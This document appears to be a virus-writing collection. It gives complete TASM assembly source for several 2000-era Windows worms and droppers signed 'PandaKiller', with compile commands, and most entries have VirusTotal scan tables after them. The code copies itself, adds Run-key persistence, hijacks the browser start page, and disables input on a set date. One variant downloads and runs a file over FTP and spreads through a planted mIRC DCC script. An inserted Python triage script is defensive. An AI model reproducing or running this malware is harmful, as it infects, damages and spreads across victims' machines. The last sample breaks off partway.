        push offset taille              ;number of bytes (taille is an EQU constant)
        push offset DEBUTV              ;the script text
        push [flz_handle]
        call WriteFile
        push [flz_handle]
        call CloseHandle
MESSAGE:
        push 40h                        ;MB_ICONINFORMATION
        push offset TITRE
        push offset TEXTE
        push 0
        call MessageBoxA
        push 40h
        push offset TITRE2
        push offset TEXTE2
        push 0
        call MessageBoxA
        push 1                          ;SW_SHOWNORMAL
        push offset prog                ;run C:\Salut.vbs
        call WinExec
FIN:
        push 0
        call ExitProcess
end REGISTRE

VirusTotal scan of Panda3.exe, received on 05.16.2009 18:00:23 (CET)

Additional information
File size: 8192 bytes
MD5: 104229b6d583df50db044f0d89fc7db9
SHA1: db05dc880b74d864a8c47d8db22c2847b655c14a

Results returned: Generic.Malware.Ssp!.1E162891 (two engines), Type_Script, W95.Pet_Tick.gen; the remaining result cells are empty ("-"). The original table's mapping of each result to its engine did not survive extraction.

Antivirus | Version | Last update
a-squared | 4.0.0.101 | 2009.05.16
AhnLab-V3 | 5.0.0.2 | 2009.05.16
AntiVir | 7.9.0.168 | 2009.05.15
Antiy-AVL | 2.0.3.1 | 2009.05.15
Authentium | 5.1.2.4 | 2009.05.16
Avast | 4.8.1335.0 | 2009.05.15
AVG | 8.5.0.336 | 2009.05.15
BitDefender | 7.2 | 2009.05.16
CAT-QuickHeal | 10.00 | 2009.05.15
ClamAV | 0.94.1 | 2009.05.16
Comodo | 1157 | 2009.05.08
DrWeb | 5.0.0.12182 | 2009.05.16
eSafe | 7.0.17.0 | 2009.05.14
eTrust-Vet | 31.6.6508 | 2009.05.16
F-Prot | 4.4.4.56 | 2009.05.16
F-Secure | 8.0.14470.0 | 2009.05.15
Fortinet | 3.117.0.0 | 2009.05.16
GData | 19 | 2009.05.16
Ikarus | T3.1.1.49.0 | 2009.05.16
K7AntiVirus | 7.10.737 | 2009.05.16
Kaspersky | 7.0.0.125 | 2009.05.16
McAfee | 5616 | 2009.05.15
McAfee+Artemis | 5616 | 2009.05.15
McAfee-GW-Edition | 6.7.6 | 2009.05.15
Microsoft | 1.4602 | 2009.05.16
NOD32 | 4080 | 2009.05.15
Norman | 6.01.05 | 2009.05.16
nProtect | 2009.1.8.0 | 2009.05.16
Panda | 10.0.0.14 | 2009.05.16
PCTools | 4.4.2.0 | 2009.05.16
Prevx | 3.0 | 2009.05.16
Rising | 21.29.52.00 | 2009.05.16
Sophos | 4.41.0 | 2009.05.16
Sunbelt | 3.2.1858.2 | 2009.05.16
Symantec | 1.4.4.12 | 2009.05.16
TheHacker | 6.3.4.1.326 | 2009.05.15
TrendMicro | 8.950.0.1092 | 2009.05.15
VBA32 | 3.12.10.5 | 2009.05.16
ViRobot | 2009.5.15.1737 | 2009.05.15
VirusBuster | 4.6.5.0 | 2009.05.16
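The four droppers above (Dwarf, Dwarf259, Dwarf7 and Panda3) all keep their .vbs payload as plain db strings and persist it through a Run key written with WScript.Shell.RegWrite, with the payload either a rundll32 call (user.exe,ExitWindows, mouse/keyboard disable) or a batch file full of del lines, and often gated on a date. The triage script below is an added example and not code from the archive: it carves printable script text out of a dropper image and reports the persistence and payload indicators those scripts use. The sample script text is reconstructed from the Dwarf7 prog2 and Panda3 DEBUTV strings above; the bytes around it in DROPPER_BLOB are constructed filler, not a real COM image, and all function and field names are mine.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed samples (not captured from a live machine): the script text the
# Dwarf7 'prog2' and Panda3 'DEBUTV' db strings above produce once written to
# disk, abridged and CRLF-joined the way the droppers emit it.
DWARF7_PROG2 = (
    'If Day(Now) = 5 And Month(Now) = 12 Then\r\n'
    'Set W=CreateObject("WScript.Shell")\r\n'
    r'W.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DwArF", '
    r'"C:\WINDOWS\RUNDLL32.EXE %windir%\system\user.exe,Exitwindows"' '\r\n'
    r'W.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DwArF2", '
    r'"C:\autoexe.bat"' '\r\n'
    'Set X=CreateObject("Scripting.FileSystemObject")\r\n'
    r'file="C:\autoexe.bat"' '\r\n'
    'Set O=X.CreateTextFile(file, True, False)\r\n'
    'O.Writeline "@echo off"\r\n'
    r'O.Writeline "del C:\WINDOWS\*.ini"' '\r\n'
    r'O.Writeline "del C:\WINDOWS\SYSTEM\*.dll"' '\r\n'
    'End If\r\n'
)
PANDA3_SALUT = (
    'Set W = Wscript.CreateObject("WScript.Shell")\r\n'
    r'W.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", '
    r'"http://www.penthouse.com"' '\r\n'
    r'W.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\StartWindoz", '
    r'"C:\WINDOWS\SYSTEM\WSock32.dll.vbs"' '\r\n'
    'If Year(Now) = 2001 Then\r\n'
    r' P.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Stop1", '
    r'"rundll32,mouse disable"' '\r\n'
    'End If\r\n'
)
# Constructed stand-in for a dropper image: a few opcode-like bytes, the
# NUL-terminated target path, then the script stored verbatim the way the
# COM files above store it. Not a real Dwarf binary.
DROPPER_BLOB = (b'\xb4\x3c\x31\xc9\xba\x14\x01\xcd\x21' + b'c:\\dwarf.vbs\x00'
                + DWARF7_PROG2.encode('ascii') + b'\x00')

TEXT_RUN = re.compile(rb'[\t\r\n\x20-\x7e]{16,}')
REGWRITE = re.compile(r'\.RegWrite\s+"([^"]+)"\s*,\s*"([^"]*)"', re.I)
DATE_GATE = re.compile(r'\bIf\s+(.*?\b(?:Day|Month|Year)\(Now\).*?)\s+Then\b', re.I)
DEL_LINE = re.compile(r'Writeline\s+"(del\s+[^"]+)"', re.I)
DISGUISE = re.compile(r'\b[\w-]+\.(?:dll|txt|exe|jpg)\.vbs\b', re.I)
RUN_MARK = '\\CURRENTVERSION\\RUN\\'


@dataclass
class VbsFindings:
    run_entries: List[Tuple[str, str]] = field(default_factory=list)  # (normalised key, command)
    start_page: Optional[str] = None
    date_gate: Optional[str] = None
    shutdown_at_boot: bool = False
    input_disable: bool = False
    deletes: List[str] = field(default_factory=list)
    disguised: List[str] = field(default_factory=list)


def carve_scripts(blob: bytes) -> List[str]:
    """Printable runs of a binary that look like WSH script: the droppers
    above keep the .vbs as raw db strings, so no emulation is needed."""
    return [run.decode('ascii') for run in TEXT_RUN.findall(blob)
            if re.search(rb'WScript|CreateObject', run, re.I)]


def analyze_vbs(text: str) -> VbsFindings:
    """Extract Run-key persistence and what it launches, IE start-page hijacks,
    date-gated logic, batch 'del' lines and double-extension script names."""
    f = VbsFindings()
    for key, value in REGWRITE.findall(text):
        k = key.upper().replace('HKEY_LOCAL_MACHINE', 'HKLM').replace('HKEY_CURRENT_USER', 'HKCU')
        if RUN_MARK in k:
            f.run_entries.append((k, value))
            v = value.lower()
            if 'rundll32' in v and 'exitwindows' in v:          # user.exe,ExitWindows at logon
                f.shutdown_at_boot = True
            if 'rundll32' in v and 'disable' in v and ('mouse' in v or 'keyboard' in v):
                f.input_disable = True
        elif k.endswith('\\INTERNET EXPLORER\\MAIN\\START PAGE'):
            f.start_page = value
    m = DATE_GATE.search(text)
    if m:
        f.date_gate = m.group(1).strip()
    f.deletes = DEL_LINE.findall(text)
    f.disguised = sorted(set(DISGUISE.findall(text)))
    return f


def summarize(f: VbsFindings) -> List[str]:
    """One line per indicator, in the order an analyst would report them."""
    out = [f'Run-key persistence: {k} -> {v}' for k, v in f.run_entries]
    if f.shutdown_at_boot:
        out.append('Payload: Windows shuts down at logon (rundll32 user.exe,ExitWindows)')
    if f.input_disable:
        out.append('Payload: mouse/keyboard disabled through rundll32 at logon')
    if f.start_page:
        out.append(f'Browser hijack: IE start page -> {f.start_page}')
    if f.date_gate:
        out.append(f'Logic bomb: runs only when {f.date_gate}')
    out += [f'Destructive batch line: {d}' for d in f.deletes]
    out += [f'Double-extension script name: {n}' for n in f.disguised]
    return out
```

Run it as `for s in carve_scripts(open(path, 'rb').read()): print('\n'.join(summarize(analyze_vbs(s))))`. The carve step relies on the script being stored in clear; the later worms in the table above that are "encrypted with PetiK's VBS Hex Convert" would need the hex layer decoded first.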

comment $
W32.PandaKiller.A by PandaKiller, 12 October 2000
CREATES TWO DIRECTORIES:
 - C:\PandaKiller
 - %windir%\Panda
COPIES ITSELF TO:
 - %windir%\Pandakiller.exe
 - %windir%\Panda\Stages.exe
 - %system%\Monopoly.exe

DESCRIPTION: In C:\PandaKiller it creates the file "EMail.txt", in which it
writes an e-mail address where we can be contacted, plus a copyright notice.
It displays a message and swaps the mouse buttons if the user clicks Retry,
and also changes the registered owner name to PandaKiller.

TO COMPILE:
 tasm32 /M /ML PandaKiller.asm
 tlink32 -Tpe -x -aa PandaKiller.obj,,,import32

Links: www.coderz.net/matrix  www.matrixvx.org  www.coderz.net
$

.386p
locals
jumps
.model flat
extrn CreateDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetModuleHandleA:PROC
extrn GetModuleFileNameA:PROC
extrn CopyFileA:PROC
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn CloseHandle:PROC
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
extrn lstrcat:PROC
extrn MessageBoxA:PROC
extrn SwapMouseButton:PROC
extrn ExitProcess:PROC

.data
moi     dd 260 dup (0)                  ;own path (GetModuleFileNameA)
targ1   dd 260 dup (0)                  ;scratch path buffer
targ10  dd 260 dup (0)                  ;scratch path buffer
fh      dd 0
octets  dd 0
l       dd 0
p       dd 0
CLE     db "\Software\Microsoft\Windows\CurrentVersion",00h
DONNEE  db "PandaKiller",00h
NOM     db "RegisteredOwner",00h
rep1    db "C:\PandaKiller",00h
rep2    db "\Panda",00h
copie1  db "\PandaKiller.exe",00h
copie2  db "\Monopoly.exe",00h
copie3  db "\Panda\Stages.exe",00h
fichier db "\PandaKiller\EMail.txt",00h
TITRE   db "Par PandaKiller le 12/10/00",00h
TEXTE   db "****************************",10,13
        db "Ce fichier n'est pas valide!",10,13
        db "****************************",00h
TXT     db "[PandaKiller]",0dh,0ah
        db "Pour tout contact : Panda34@caramail.com",0dh,0ah
        db "VBS/LoveLetter.A",0dh,0ah
        db "VBS/IE55",0dh,0ah
        db "W32.Happy99",0dh,0ah
        db "I-Worm/Kak.A",0dh,0ah
        db "W32.PandaKiller.A par PandaKiller (c)2000",00h
taille  equ $-TXT

.code
DEBUT:
CREER_REPERTOIRE:
        push 00000000h
        push offset rep1
        call CreateDirectoryA           ;C:\PandaKiller
        push 260
        push offset targ1
        call GetWindowsDirectoryA
        push offset rep2
        push offset targ1
        call lstrcat
        push offset targ1
        call CreateDirectoryA           ;%windir%\Panda
AUTO_COPIE:
        push 00000000h
        call GetModuleHandleA
        push 260
        push offset moi
        push eax
        call GetModuleFileNameA         ;own path into moi
        push 260
        push offset targ1
        call GetWindowsDirectoryA
        push offset copie1
        push offset targ1
        call lstrcat
        push 00000000h
        push offset targ1
        push offset moi
        call CopyFileA                  ;%windir%\PandaKiller.exe
        push 260
        push offset targ1
        call GetSystemDirectoryA
        push offset copie2
        push offset targ1
        call lstrcat
        push 00000000h
        push offset targ1
        push offset moi
        call CopyFileA                  ;%system%\Monopoly.exe
        push 260
        push offset targ10
        call GetWindowsDirectoryA
        push offset copie3
        push offset targ10
        call lstrcat
        push 00000000h
        push offset targ10
        push offset targ1
        call CopyFileA                  ;%windir%\Panda\Stages.exe (copied from Monopoly.exe)
FICHIER_TEXTE:
        push 00000000h                  ;hTemplateFile
        push 00000080h                  ;FILE_ATTRIBUTE_NORMAL
        push 00000002h                  ;CREATE_ALWAYS
        push 00000000h                  ;lpSecurityAttributes
        push 00000001h                  ;FILE_SHARE_READ
        push 40000000h                  ;GENERIC_WRITE
        push offset fichier
        call CreateFileA
        mov [fh],eax
        push 00h                        ;lpOverlapped
        push offset octets
        push taille
        push offset TXT
        push [fh]
        call WriteFile
        push [fh]
        call CloseHandle
REGISTRE:
        push offset l                   ;lpdwDisposition (assumed: this push is missing from the
                                        ;extracted listing but present in Panda3 and PandaKiller.B)
        push offset p                   ;phkResult
        push 0
        push 1F0000h + 1 + 2h           ;STANDARD_RIGHTS_ALL | KEY_QUERY_VALUE | KEY_SET_VALUE
        push 0
        push 0
        push 0
        push offset CLE
        push 80000002h                  ;HKEY_LOCAL_MACHINE
        call RegCreateKeyExA
        push 05h                        ;cbData = 5, shorter than "PandaKiller"
        push offset DONNEE              ;PandaKiller
        push 01h                        ;REG_SZ
        push 0
        push offset NOM                 ;into RegisteredOwner
        push p
        call RegSetValueExA             ;create the registry value
        push 0
        call RegCloseKey                ;close the registry (passes 0, not p; as in the original)
MESSAGE:
        push 35h                        ;MB_RETRYCANCEL | MB_ICONWARNING
        push offset TITRE
        push offset TEXTE
        push 00h
        call MessageBoxA
        cmp eax,4                       ;IDRETRY?
        jne FIN
SOURIS:
        push 01h
        call SwapMouseButton            ;swap the mouse buttons, then ask again
        jmp MESSAGE
FIN:
        push 0
        call ExitProcess
end DEBUT

VirusTotal scan of W32PKa.exe, received on 05.16.2009 10:40:20 (CET)

Additional information
File size: 8192 bytes
MD5: 711f77c3a07ea085bee6c1bfa884f012
SHA1: 3cd6512c587c3b0292264177f3d538aa6e9c6965

Results returned: W32/Heuristic-131!Eldorado (two engines), Suspicious:W32/Malware!Gemini, Heur.Worm.Generic, probably unknown NewHeur_PE, BehavesLike.Win32.Malware (v), W95.Pet_Tick.gen; the remaining result cells are empty ("-"). The original table's mapping of each result to its engine did not survive extraction.

Antivirus | Version | Last update
a-squared | 4.0.0.101 | 2009.05.16
AhnLab-V3 | 5.0.0.2 | 2009.05.15
AntiVir | 7.9.0.168 | 2009.05.15
Antiy-AVL | 2.0.3.1 | 2009.05.15
Authentium | 5.1.2.4 | 2009.05.15
Avast | 4.8.1335.0 | 2009.05.15
AVG | 8.5.0.336 | 2009.05.15
BitDefender | 7.2 | 2009.05.16
CAT-QuickHeal | 10.00 | 2009.05.15
ClamAV | 0.94.1 | 2009.05.15
Comodo | 1157 | 2009.05.08
DrWeb | 5.0.0.12182 | 2009.05.16
eSafe | 7.0.17.0 | 2009.05.14
eTrust-Vet | 31.6.6508 | 2009.05.16
F-Prot | 4.4.4.56 | 2009.05.15
F-Secure | 8.0.14470.0 | 2009.05.15
Fortinet | 3.117.0.0 | 2009.05.16
GData | 19 | 2009.05.16
Ikarus | T3.1.1.49.0 | 2009.05.16
K7AntiVirus | 7.10.735 | 2009.05.14
Kaspersky | 7.0.0.125 | 2009.05.16
McAfee | 5616 | 2009.05.15
McAfee+Artemis | 5616 | 2009.05.15
McAfee-GW-Edition | 6.7.6 | 2009.05.15
Microsoft | 1.4602 | 2009.05.16
NOD32 | 4080 | 2009.05.15
Norman | 6.01.05 | 2009.05.16
nProtect | 2009.1.8.0 | 2009.05.16
Panda | 10.0.0.14 | 2009.05.15
PCTools | 4.4.2.0 | 2009.05.15
Prevx | 3.0 | 2009.05.16
Rising | 21.29.51.00 | 2009.05.16
Sophos | 4.41.0 | 2009.05.16
Sunbelt | 3.2.1858.2 | 2009.05.16
Symantec | 1.4.4.12 | 2009.05.16
TheHacker | 6.3.4.1.326 | 2009.05.15
TrendMicro | 8.950.0.1092 | 2009.05.15
VBA32 | 3.12.10.5 | 2009.05.16
ViRobot | 2009.5.15.1737 | 2009.05.15
VirusBuster | 4.6.5.0 | 2009.05.15

comment $
W32.PandaKiller.B by PandaKiller, 14 October 2000

COPIES ITSELF TO:
 - %windir%\WinExec.exe

DESCRIPTION:
This program changes the Windows registered owner name to PandaKiller. It copies itself into %windir% (the WINDOWS folder) and changes the Internet Explorer start page. It then creates three files:
 - FTP.DRV : an ftp.exe command script that connects by FTP and downloads a program, KILL_CIH.EXE (a program against CIH)
 - FTP.BAT : runs FTP.DRV
 - MIRC.EKP : an mIRC script that makes the file propagate itself. On connect it launches FTP.BAT and copies WINEXEC.EXE to PICTURE.EXE. When someone joins the channel, it sends them PICTURE.EXE.
   *worm*        : also sends PICTURE.EXE
   *KKK*         : disconnects
   *White Power* : exits the program
   *hitler*      : deletes Regedit.exe

TO COMPILE:
tasm32 /M /ML PandaKiller2.asm
tlink32 -Tpe -x -aa PandaKiller2.obj,,,import32

Links: www.coderz.net/matrix www.matrixvx.org www.coderz.net
$

.386p
locals
jumps
.model flat

extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
extrn GetWindowsDirectoryA:PROC
extrn GetModuleHandleA:PROC
extrn GetModuleFileNameA:PROC
extrn CopyFileA:PROC
extrn lstrcat:PROC
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn CloseHandle:PROC
extrn WinExec:PROC
extrn CreateDirectoryA:PROC
extrn ExitProcess:PROC

.data
moi     dd 260 dup (0)                  ;path of the running executable
targ1   dd 260 dup (0)                  ;%windir% + copie1
fh      dd 0                            ;file handle
octets  dd 0                            ;bytes written
l       dd 0                            ;RegCreateKeyEx disposition
p       dd 0                            ;opened key handle
CLE     db "\Software\Microsoft\Windows\CurrentVersion",00h
DONNEE  db "PandaKiller",00h
NOM     db "RegisteredOwner",00h
CLE2    db "\Software\Microsoft\Internet Explorer\Main",00h
DONNEE2 db "http://kadosh.multimania.com",00h
NOM2    db "Start Page",00h
CLE3    db "\Software\Microsoft\Windows\CurrentVersion\Run",00h
DONNEE3 db "C:\Win\kill_cih.exe",00h
NOM3    db "killcih",00h
copie1  db "\WinExec.exe",00h
dossier db "C:\Win",00h
bat     db "C:\Win\ftp.bat",00h
drv     db "C:\Win\ftp.drv",00h
ini     db "C:\Win\mirc.ekp",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
script3 db "C:\program files\mirc\script.ini",00h
script4 db "C:\program files\mirc32\script.ini",00h

batd    db "@echo off",0dh,0ah
        db "start ftp -i -v -s:C:\Win\ftp.drv",00h
batsize equ $-batd

drvd    db "open",0dh,0ah
        db "members.aol.com",0dh,0ah
        db "pentasm99",0dh,0ah
        db "cd Panda",0dh,0ah
        db "binary",0dh,0ah
        db "lcd C:\Win",0dh,0ah
        db "get kill_cih.exe",0dh,0ah
        db "bye",0dh,0ah
        db "exit",0dh,0ah
drvsize equ $-drvd

inid    db "[SCRIPT]",0dh,0ah
        db "n1=on 1:start:{",0dh,0ah
        db "n2=.remote on",0dh,0ah
        db "n3=.ctcps on",0dh,0ah
        db "n4=.events on",0dh,0ah
        db "n5=}",0dh,0ah
        db "n6=on 1:connect:{",0dh,0ah
        db "n7= /.copy -0 C:\Windows\WinExec.exe C:\Picture.exe",0dh,0ah
        db "n8= /.run -n C:\command.com start C:\Win\ftp.bat",0dh,0ah
        db "n9=on 1:join:#:{",0dh,0ah
        db "n10=if ( $nick == $ma ) {halt } .dcc send $nick C:\Picture.exe",0dh,0ah
        db "n11=}",0dh,0ah
        db "n12=on 1:text:*worm*:{",0dh,0ah
        db "n13=if ( $nick == $ma ) {halt } .dcc send $nick C:\Picture.exe",0dh,0ah
        db "n14=}",0dh,0ah
        db "n15=on 1:text:*KKK*:/disconnect",0dh,0ah
        db "n16=on 1:text:*white power*:/exit",0dh,0ah
        db "n17=on 1:text:*hitler*:/remove C:\Windows\regedit.exe",0dh,0ah
inisize equ $-inid

.code
REGISTRE:
        push offset l
        push offset p
        push 0
        push 1F0000h + 1 + 2h
        push 0
        push 0
        push 0
        push offset CLE
        push 80000002h                  ;HKEY_LOCAL_MACHINE
        call RegCreateKeyExA
        push 05h
        push offset DONNEE              ;PandaKiller
        push 01h                        ;REG_SZ
        push 0
        push offset NOM                 ;into RegisteredOwner
        push p
        call RegSetValueExA             ;CREATES THE VALUE
        push 0
        call RegCloseKey                ;CLOSES THE REGISTRY (the original passes 0, not p)

AUTO_COPIE:
        push 00000000h
        call GetModuleHandleA
        push 260
        push offset moi
        push eax
        call GetModuleFileNameA
        push 260
        push offset targ1
        call GetWindowsDirectoryA
        push offset copie1              ;%windir%\WinExec.exe
        push offset targ1
        call lstrcat
        push 00000000h
        push offset targ1
        push offset moi
        call CopyFileA

CREER_DOSSIER:
        push 00000000h
        push offset dossier             ;C:\Win
        call CreateDirectoryA

REGISTRE2:
        push offset l
        push offset p
        push 0
        push 1F0000h + 1 + 2h
        push 0
        push 0
        push 0
        push offset CLE2
        push 80000001h                  ;HKEY_CURRENT_USER
        call RegCreateKeyExA
        push 05h
        push offset DONNEE2             ;kadosh.multimania.com
        push 01h
        push 0
        push offset NOM2                ;Start Page
        push p
        call RegSetValueExA             ;CREATES THE VALUE
        push 0
        call RegCloseKey                ;CLOSES THE REGISTRY
        push offset l
        push offset p
        push 0
        push 1F0000h + 1 + 2h
        push 0
        push 0
        push 0
        push offset CLE3
        push 80000002h                  ;HKEY_LOCAL_MACHINE
        call RegCreateKeyExA
        push 05h
        push offset DONNEE3             ;C:\Win\kill_cih.exe (the original comment read C:\nobo.exe)
        push 01h
        push 0
        push offset NOM3                ;killcih (the original comment read NOBO)
        push p
        call RegSetValueExA             ;CREATES THE VALUE
        push 0
        call RegCloseKey                ;CLOSES THE REGISTRY

FICHIER:
        push 00000000h                  ;hTemplateFile
        push 00000080h                  ;FILE_ATTRIBUTE_NORMAL
        push 00000002h                  ;CREATE_ALWAYS
        push 00000000h
        push 00000001h                  ;FILE_SHARE_READ
        push 40000000h                  ;GENERIC_WRITE
        push offset bat
        call CreateFileA
        mov [fh],eax
        push 00h
        push offset octets
        push batsize
        push offset batd
        push [fh]
        call WriteFile
        push [fh]
        call CloseHandle
        push 00000000h
        push 00000080h
        push 00000002h
        push 00000000h
        push 00000001h
        push 40000000h
        push offset drv
        call CreateFileA
        mov [fh],eax
        push 00h
        push offset octets
        push drvsize
        push offset drvd
        push [fh]
        call WriteFile
        push [fh]
        call CloseHandle
        push 00000000h
        push 00000080h
        push 00000002h
        push 00000000h
        push 00000001h
        push 40000000h
        push offset ini
        call CreateFileA
        mov [fh],eax
        push 00h
        push offset octets
        push inisize
        push offset inid
        push [fh]
        call WriteFile
        push [fh]
        call CloseHandle

COPIE_MIRC:
        push 00000000h
        push offset script1
        push offset ini
        call CopyFileA
        push 00000000h
        push offset script2
        push offset ini
        call CopyFileA
        push 00000000h
        push offset script3
        push offset ini
        call CopyFileA
        push 00000000h
        push offset script4
        push offset ini
        call CopyFileA

WinExecBat:
        push 1
        push offset bat
        call WinExec

FIN:
        push 0
        call ExitProcess

end REGISTRE

File W32PKb.exe received on 05.16.2009 10:41:58 (CET)

Scanned by the same 40 engines, with the same versions and signature dates, as W32PKa.exe above.

Result (16 of the 40 engines reported a detection; the engine column for these results did not survive extraction):
HEUR/Malware, Generic.Malware.SIsp!.664610C1, Trojan.MulDrop.origin, W32/P2PWorm, Generic.Malware.SIsp!.664610C1, Heur.StartPage, New Malware.b, New Malware.b, Heuristic.Malware, probably unknown NewHeur_PE, W32/P2PWorm, Suspicious file, IRC.Sensi.B, BehavesLike.Win32.Malware (v), W95.Pet_Tick.gen, IRC.Sensi.B

Additional information
File size: 8192 bytes
MD5:  58c6c31028ac1b84cc73eb13300f21da
SHA1: a73cf795bc76385b71158a64cc770a813b399b74

comment $
(ASCII-art banner)

W32.PandaKiller.C by PandaKiller, 17 October 2000

COPIES ITSELF TO:
 - %windir%\WinExec.exe

DESCRIPTION:
 5/12 : sets the registered owner name to PandaKiller
 2001 : disables the keyboard and the mouse

TO COMPILE:
tasm32 /M /ML PandaKiller3.asm
tlink32 -Tpe -x -aa PandaKiller3.obj,,,import32
$

jumps
locals
.386
.model flat

extrn GetModuleHandleA:PROC
extrn GetModuleFileNameA:PROC
extrn GetWindowsDirectoryA:PROC
extrn CopyFileA:PROC
extrn lstrcat:PROC
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
extrn GetSystemTime:PROC
extrn MessageBoxA:PROC
extrn ExitProcess:PROC

.data
moi     dd 260 dup (0)                  ;path of the running executable
targ1   dd 260 dup (0)                  ;%windir% + copie
copie   db "\WinExec.exe",00h
l       dd 0                            ;RegCreateKeyEx disposition
p       dd 0                            ;opened key handle
CLE     db "\Software\Microsoft\Windows\CurrentVersion",00h
DONNEE  db "PandaKiller",00h
NOM     db "RegisteredOwner",00h
CLE2    db "\Software\Microsoft\Windows\CurrentVersion\Run",00h
DONNEE2 db "%windir%\WinExec.exe",00h
NOM2    db "WinExec",00h
DONNEE3 db "rundll32 mouse,disable",00h
NOM3    db "Stop1",00h
DONNEE4 db "rundll32 keyboard,disable",00h
NOM4    db "Stop2",00h
TITRE   db "T.PK.3",00h
TEXTE   db "VOUS SOUHAITE UNE BONNE ANNEE !",00h   ;"WISHES YOU A HAPPY NEW YEAR!"

SYSTIME struct
  wYear         WORD ?
  wMonth        WORD ?
  wDayOfWeek    WORD ?
  wDay          WORD ?
  wHour         WORD ?
  wMinute       WORD ?
  wsecond       WORD ?
  wMilliseconds WORD ?
SYSTIME ends
SystemTime SYSTIME <>

.code
DEBUT:
AUTO_COPIE:
        push 00000000h
        call GetModuleHandleA
        push 260
        push offset moi
        push eax
        call GetModuleFileNameA
        push 260
        push offset targ1
        call GetWindowsDirectoryA
        push offset copie               ;%windir%\WinExec.exe
        push offset targ1
        call lstrcat
        push 00000000h
        push offset targ1
        push offset moi
        call CopyFileA
        push offset l
        push offset p
        push 0
        push 1F0000h + 1 + 2h
        push 0
        push 0
        push 0
        push offset CLE2                ;...\CurrentVersion\Run
        push 80000002h                  ;HKEY_LOCAL_MACHINE
        call RegCreateKeyExA
        push 05h
        push offset DONNEE2             ;%windir%\WinExec.exe (REG_SZ, so %windir% is stored literally)
        push 01h
        push 0
        push offset NOM2                ;WinExec
        push p
        call RegSetValueExA             ;CREATES THE VALUE
        push 0
        call RegCloseKey                ;CLOSES THE REGISTRY

HEURE:
        push offset SystemTime
        call GetSystemTime
        cmp [SystemTime.wMonth],0Ch     ;December
        jne HEURE2
        cmp [SystemTime.wDay],05h       ;the 5th
        jne HEURE2

REGISTRE:
        push offset l
        push offset p
        push 0
        push 1F0000h + 1 + 2h
        push 0
        push 0
        push 0
        push offset CLE
        push 80000002h                  ;HKEY_LOCAL_MACHINE
        call RegCreateKeyExA
        push 05h
        push offset DONNEE              ;PandaKiller
        push 01h
        push 0
        push offset NOM                 ;into RegisteredOwner
        push p
        call RegSetValueExA             ;CREATES THE VALUE
        push 0
        call RegCloseKey                ;CLOSES THE REGISTRY

HEURE2:
        push offset SystemTime
        call GetSystemTime
        cmp [SystemTime.wYear],7D1h     ;2001
        jne FIN

REGISTRE2:
        push offset l
        push offset p
        push 0
        push 1F0000h + 1 + 2h
        push 0
        push 0
        push 0
        push offset CLE2
        push 80000002h                  ;HKEY_LOCAL_MACHINE
        call RegCreateKeyExA
        push 05h
        push offset DONNEE3             ;rundll32 mouse,disable
        push 01h
        push 0
        push offset NOM3                ;Stop1
        push p
        call RegSetValueExA             ;CREATES THE VALUE
        push offset l
        push offset p
        push 0
        push 1F0000h + 1 + 2h
        push 0
        push 0
        push 0
        push offset CLE2
        push 80000002h                  ;HKEY_LOCAL_MACHINE
        call RegCreateKeyExA
        push 05h
        push offset DONNEE4             ;rundll32 keyboard,disable
        push 01h
        push 0
        push offset NOM4                ;Stop2
        push p
        call RegSetValueExA             ;CREATES THE VALUE
        push 0
        call RegCloseKey                ;CLOSES THE REGISTRY

MESSAGE:
        push 40h                        ;MB_ICONINFORMATION
        push offset TITRE
        push offset TEXTE
        push 0
        call MessageBoxA

FIN:
        push 0
        call ExitProcess

end DEBUT

File W32PKc.exe received on 05.16.2009 10:42:04 (CET)

Scanned by the same 40 engines, with the same versions and signature dates, as W32PKa.exe above.

Result (6 of the 40 engines reported a detection; the engine column for these results did not survive extraction):
BAT/Generic, Trojan.DownLoader.origin, Suspicious:W32/Malware!Gemini, probably unknown NewHeur_PE, Suspicious file, BehavesLike.Win32.Malware (v)

Additional information
File size: 8192 bytes
MD5:  a133a8af3b031045bd0ae4c7d9fa4210
SHA1: d3481290f42e9f1485d7d9cdc5184159e5272297

comment $
(ASCII-art banner)

W95/98.PandaKiller by PandaKiller, 1 November 2000

TO COMPILE:
tasm32 /M /ML ?????.asm
tlink32 -Tpe -x -aa ?????.obj,,,import32
$

.386
jumps
locals
.model flat, stdcall

;KERNEL32.dll
extrn lstrcat:PROC
extrn WritePrivateProfileStringA:PROC
extrn GetModuleFileNameA:PROC
extrn CopyFileA:PROC
extrn CreateFileA:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn CloseHandle:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
extrn Sleep:PROC
extrn WinExec:PROC
extrn WriteFile:PROC
extrn GetSystemTime:PROC
;USER32.dll
extrn MessageBoxA:PROC
extrn SwapMouseButton:PROC
extrn ExitWindowsEx:PROC
extrn GetVersionExA:PROC
;ADVAPI32.dll
extrn RegCreateKeyExA:PROC
extrn RegCloseKey:PROC

.data
szOrig  db 260 dup (0)                  ;path of the running executable
szCopie db 260 dup (0)                  ;%windir%\WinExec.exe
szWsk1  db 260 dup (0)                  ;%system%\WSOCK32.DLL
szWsk2  db 260 dup (0)                  ;%system%\WSOCK32.TPK
szWin   db 260 dup (0)                  ;%windir%\WININIT.INI
szWin2  db 260 dup (0)                  ;%windir%\WIN.INI
fh      dd 0
octets  dd 0
regDisp dd 0                            ;RegCreateKeyEx disposition
regResu dd 0                            ;opened key handle
Copie   db "\WinExec.exe",00h
Wsk1    db "\WSOCK32.DLL",00h
Wsk2    db "\WSOCK32.TPK",00h
Wininit db "\\WININIT.INI",00h
windows db "windows",00h
run     db "run",00h
Winini  db "\\WIN.INI",00h
